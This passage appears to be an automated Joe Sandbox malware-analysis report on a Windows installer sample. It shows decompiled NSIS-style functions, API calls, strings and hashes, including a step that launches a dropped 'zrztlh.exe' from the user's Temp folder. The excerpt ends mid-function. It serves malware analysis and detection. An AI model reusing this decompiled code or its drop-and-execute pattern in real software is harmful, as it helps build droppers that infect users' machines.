                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharNext
                • String ID: "C:\Users\user\Desktop\O1ySvN9SvL.exe" $:T@$C:\
                • API String ID: 3213498283-2537113996
                • Opcode ID: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
                • Instruction ID: 378ecf4657a12380a446d3b042b521289e3ad6747402889725e3da158347204d
                • Opcode Fuzzy Hash: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
                • Instruction Fuzzy Hash: 2DF02751A10F215AEB2222644C54B7B6BACDB55320F440C37E544F61E0C3BD4C92CFAE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401E0E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                Download Yara Rule
                C-Code - Quality: 64%
                			E00401E0E() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A85(_t19);
				_t20 = E00402A85(0x31);
				_t7 = E00402A85(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\alfons\AppData\Local\Temp", "%s %s");
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\alfons\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                0x00401e16
                0x00401e1f
                0x00401e21
                0x00401e26
                0x00401e27
                0x00401e32
                0x00401e34
                0x00401e3f
                0x00401e4b
                0x00401e59
                0x00401e6b
                0x004026bf
                0x004026bf
                0x0040291d
                0x00402929

                APIs
                • wsprintfA.USER32 ref: 00401E34
                • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E62
                Strings
                • %s %s, xrefs: 00401E28
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401E2D
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401E4D
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ExecuteShellwsprintf
                • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                • API String ID: 2956387742-3979964556
                • Opcode ID: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
                • Instruction ID: 51fa150e18871bc54a8ab07165f54a8d5d4e89d78de25ff2bd43d0f4b5788034
                • Opcode Fuzzy Hash: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
                • Instruction Fuzzy Hash: E6F0D171B04100ABC721AFB59D4EEA93BA8DB45318B600936F800F61D2E5BC89519668
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402AC5 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00402AC5(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423fd0; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402AC5(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DDA(2);
					if(_t27 == 0) {
						__eflags =  *0x423fd0; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423fd0, 0);
				}
				return _t18;
			}










                0x00402ad5
                0x00402ae6
                0x00402aee
                0x00402b16
                0x00402afd
                0x00402b00
                0x00402b50
                0x00402b56
                0x00402b58
                0x00000000
                0x00402b58
                0x00402b0d
                0x00402b12
                0x00402b14
                0x00000000
                0x00000000
                0x00402b14
                0x00402b2b
                0x00402b33
                0x00402b3a
                0x00402b60
                0x00402b66
                0x00000000
                0x00000000
                0x00402b6e
                0x00402b74
                0x00402b76
                0x00000000
                0x00000000
                0x00000000
                0x00402b76
                0x00000000
                0x00402b49
                0x00402b5d

                APIs
                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402AE6
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B22
                • RegCloseKey.ADVAPI32(?), ref: 00402B2B
                • RegCloseKey.ADVAPI32(?), ref: 00402B50
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B6E
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Close$DeleteEnumOpen
                • String ID:
                • API String ID: 1912718029-0
                • Opcode ID: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
                • Instruction ID: a2f84c9fc7c0001da7a9db1dd1493ef20417761c41d84b505e0dd7cc978203d5
                • Opcode Fuzzy Hash: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
                • Instruction Fuzzy Hash: 17116D31A00009FEDF21AF90DE48EAF3B7DEB44344B104036FA05B50A0D3B4AE52AB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401D0E Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401D0E(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A85(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x1c),  *(_t27 - 0x3c) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                0x00401d18
                0x00401d1f
                0x00401d4e
                0x00401d56
                0x00401d5d
                0x00401d5d
                0x0040291d
                0x00402929

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
                • Instruction ID: 353d02df9da9ec42832837f4cb5a1f013013b856dd18917493dbd5b1045c63a4
                • Opcode Fuzzy Hash: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
                • Instruction Fuzzy Hash: 25F0F9B2E04104BFD700DFA4EE88DAFB7BCEB44311B005476F602F21A1C6789E428B69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040468C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                Download Yara Rule
                C-Code - Quality: 35%
                			E0040468C(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B16(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B16(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B16(_t34, 0, 0x420530, 0x420530, _a8);
				wsprintfA(_t26 + lstrlenA(0x420530), "%u.%u%s%s");
				return SetDlgItemTextA( *0x4236f8, _a4, 0x420530);
			}













                0x00404694
                0x00404698
                0x004046a0
                0x004046a3
                0x004046a4
                0x004046a6
                0x004046a8
                0x004046ab
                0x004046ab
                0x004046b2
                0x004046b8
                0x004046b8
                0x004046bf
                0x004046ca
                0x004046cb
                0x004046ce
                0x004046ce
                0x004046db
                0x004046e6
                0x004046e9
                0x004046fb
                0x00404702
                0x00404703
                0x00404712
                0x00404722
                0x0040473e

                APIs
                • lstrlenA.KERNEL32(00420530,00420530,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AC,000000DF,?,00000000,00000400), ref: 0040471A
                • wsprintfA.USER32 ref: 00404722
                • SetDlgItemTextA.USER32 ref: 00404735
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                • Instruction ID: fc2b73f6c965b4b8d77eae39fc1b1cea645aa0e87c551c7386791207db77a036
                • Opcode Fuzzy Hash: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                • Instruction Fuzzy Hash: B7110473B001243BDB106A699C06EAF369DCBC2374F14063BFA25F61D1E979AC5186EC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401BF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E00401BF8(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A85(0x33);
				 *(_t58 + 8) = E00402A85(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405A6B(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405A6B(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A85();
					_t30 = E00402A85();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A68();
					_t39 = E00402A68();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x3c) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x3c);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x3c));
					E00405A52();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                0x00401bf8
                0x00401c01
                0x00401c0d
                0x00401c10
                0x00401c1a
                0x00401c1a
                0x00401c1d
                0x00401c21
                0x00401c2b
                0x00401c2b
                0x00401c2e
                0x00401c32
                0x00401c34
                0x00401c81
                0x00401c83
                0x00401c8c
                0x00401c94
                0x00401c97
                0x00401c97
                0x00401ca0
                0x00000000
                0x00401c36
                0x00401c3d
                0x00401c3f
                0x00401c47
                0x00401c4a
                0x00401c72
                0x00401ca6
                0x00401ca6
                0x00401c4c
                0x00401c5a
                0x00401c62
                0x00401c65
                0x00401c65
                0x00401c4a
                0x00401ca9
                0x00401cac
                0x00401cb2
                0x004028c2
                0x004028c2
                0x0040291d
                0x00402929

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C5A
                • SendMessageA.USER32 ref: 00401C72
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: MessageSend$Timeout
                • String ID: !
                • API String ID: 1777923405-2657877971
                • Opcode ID: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
                • Instruction ID: 5a4a2a8e5e05dedb88239c733a2ad51f89d43fb5ccd06698c145dfd913d610d3
                • Opcode Fuzzy Hash: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
                • Instruction Fuzzy Hash: CD217C71E44108BFEF029FB0C94AAAD7BB5EB44308F14457AF901B61E1DBB98A419B58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403955 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00403955(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405A6B(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423f28; // 0x74d188
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423700 = _t18[1];
					 *0x423fc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x4236fc = _t23;
						E00405A52(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420508, E00405B16(_t13, _t24, _t26, "xwkwrbeiqiuu Setup", 0xfffffffe));
						_t11 =  *0x423f4c; // 0x3
						_t27 =  *0x423f48; // 0x74d334
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x74d34c
								_t11 = E00405B16(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                0x00403959
                0x0040395e
                0x00403964
                0x00403969
                0x00403969
                0x00403971
                0x00000000
                0x00000000
                0x00403973
                0x00403979
                0x00403981
                0x00403983
                0x00403989
                0x00403989
                0x0040398b
                0x00403997
                0x00000000
                0x00000000
                0x0040399b
                0x00000000
                0x00000000
                0x00000000
                0x0040399d
                0x004039a2
                0x004039ab
                0x004039b1
                0x004039b6
                0x004039ca
                0x004039d5
                0x004039ed
                0x004039f3
                0x004039f8
                0x00403a00
                0x00403a21
                0x00403a21
                0x00403a21
                0x00403a02
                0x00403a04
                0x00403a04
                0x00403a08
                0x00403a0b
                0x00403a0f
                0x00403a0f
                0x00403a14
                0x00403a1a
                0x00403a1a
                0x00000000
                0x00403a04
                0x004039b8
                0x004039bd
                0x004039c6
                0x004039bf
                0x004039bf
                0x004039bf
                0x004039bd

                APIs
                • SetWindowTextA.USER32(00000000,xwkwrbeiqiuu Setup), ref: 004039ED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: TextWindow
                • String ID: 1033$C:\Users\user\AppData\Local\Temp\$xwkwrbeiqiuu Setup
                • API String ID: 530164218-3104136113
                • Opcode ID: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                • Instruction ID: 8a4911383cf402a951a33a18ad4b30e04e91385bd266f89a5cbd6e28b98f55da
                • Opcode Fuzzy Hash: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                • Instruction Fuzzy Hash: A511C2B1B006119BC720DF15EC809377BBCEB88716769813BD901A73D1D73D9E028A58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004059DB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E004059DB(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				if(_t20 == 0) {
					_a8 = 0x400;
					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					return RegCloseKey(_a20);
				}
				return _t20;
			}





                0x004059eb
                0x004059ed
                0x004059fa
                0x00405a04
                0x00405a0c
                0x00405a11
                0x00405a2d
                0x00405a3b
                0x00405a3b
                0x00405a40
                0x00000000
                0x00405a46
                0x00405a4f

                APIs
                • RegOpenKeyExA.ADVAPI32(0041FD08,00000006,00000000,-00004250,-00004250,00000002,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,0041FD08,00000006,0041FD08), ref: 00405A04
                • RegQueryValueExA.ADVAPI32(-00004250,0041FD08,00000000,?,?,00000006,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,0041FD08), ref: 00405A25
                • RegCloseKey.ADVAPI32(-00004250,?,00405BE9,80000002,Software\Microsoft\Windows\CurrentVersion,-00004250,C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,0041FD08), ref: 00405A46
                Strings
                • C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx, xrefs: 004059DE
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx
                • API String ID: 3677997916-1449584905
                • Opcode ID: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                • Instruction ID: ed18225876ffcc918a102faa5279ae5b239897be87de75614ca521a3281ae21e
                • Opcode Fuzzy Hash: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                • Instruction Fuzzy Hash: 91015A7114120EEFDB128F64EC84AEB3FACEF14398F004536F954A6120D235D964DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004055E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004055E7(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                0x004055e8
                0x004055ff
                0x00405607
                0x00405607
                0x0040560f

                APIs
                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055ED
                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055F6
                • lstrcatA.KERNEL32(?,00409010), ref: 00405607
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E7
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: CharPrevlstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\
                • API String ID: 2659869361-823278215
                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction ID: 96202b13295bd2e64ca1d8ffa69cec5526f215a27c510a3f916c0d268ec15c79
                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                • Instruction Fuzzy Hash: 27D0A9A2609A302AE20232158C09F8F7A28CF42341B450822F100B2292C23C3C818BEE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402366 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00402366(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t32;
				void* _t37;

				_t15 = E00402B7A(__eax);
				_t32 =  *((intOrPtr*)(_t37 - 0x14));
